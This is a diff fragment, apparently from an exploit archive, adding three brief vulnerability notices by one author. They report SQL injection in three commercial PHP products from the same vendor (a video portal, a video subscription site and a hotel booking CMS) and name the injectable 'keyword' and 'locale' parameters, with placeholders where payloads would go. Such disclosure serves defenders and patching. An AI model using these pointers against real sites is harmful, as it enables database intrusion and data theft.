+# Software Buy: https://codecanyon.net/item/codepaul-clipmass-video-portal-site/14681505
+# Demo: http://codepaul.com/clipmass/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search?keyword=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41306.txt b/platforms/php/webapps/41306.txt
new file mode 100755
index 000000000..d396f3661
--- /dev/null
+++ b/platforms/php/webapps/41306.txt
@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: TV - Video Subscription - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://codepaul.com/
+# Software Buy: https://codecanyon.net/item/tv-video-subscription/13966427
+# Demo: http://codepaul.com/tv/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search?keyword=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41307.txt b/platforms/php/webapps/41307.txt
new file mode 100755
index 000000000..561fef20d
--- /dev/null
+++ b/platforms/php/webapps/41307.txt
@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: HotelCMS with Booking Engine - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://codepaul.com/
+# Software Buy: https://codecanyon.net/item/hotelcms-with-booking-engine/12789671
+# Demo: http://codepaul.com/hotelcms/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/locale?locale=[SQL]
+# # # # #
\ No newline at end of file